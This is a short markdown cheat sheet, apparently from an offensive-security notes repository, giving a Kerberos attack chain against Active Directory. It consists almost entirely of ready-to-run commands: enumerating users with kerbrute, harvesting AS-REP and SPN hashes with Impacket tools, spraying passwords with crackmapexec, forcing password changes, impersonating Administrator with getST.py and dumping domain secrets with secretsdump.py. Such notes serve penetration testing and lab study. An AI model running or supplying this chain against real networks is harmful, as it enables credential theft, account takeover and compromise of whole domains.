killchain-compendium/enumeration/docs/kerberoast.md

1.2 KiB

Kerberoast

Usage

List users

kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST

Get Users

  • Impacket's GetNPUsers.py to get Hashes of userlist
GetNPUsers.py -no-pass <DomainName>/  -usersfile users.txt -format john -outputfile hashes

Find SPNs

GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP 

or

pyverview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>

Further Intel

findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP

Check Found Users

  • Use crackmapexec to check access to further user accounts with the password of the user found with GetNPUsers.py
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
* Watch out for `STATUS_PASSWORD_MUST_CHANGE`
* Change password with 
smbpasswd.py <user>@$TARGET_IP  -newpass password123

Impersonate

getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
  • Serviceticket is save as Administrator.ccache
  • export KRB5CCNAME=Administrator.ccache
  • After that dump secrets
secretsdump.py -k -no-pass <DOMAIN>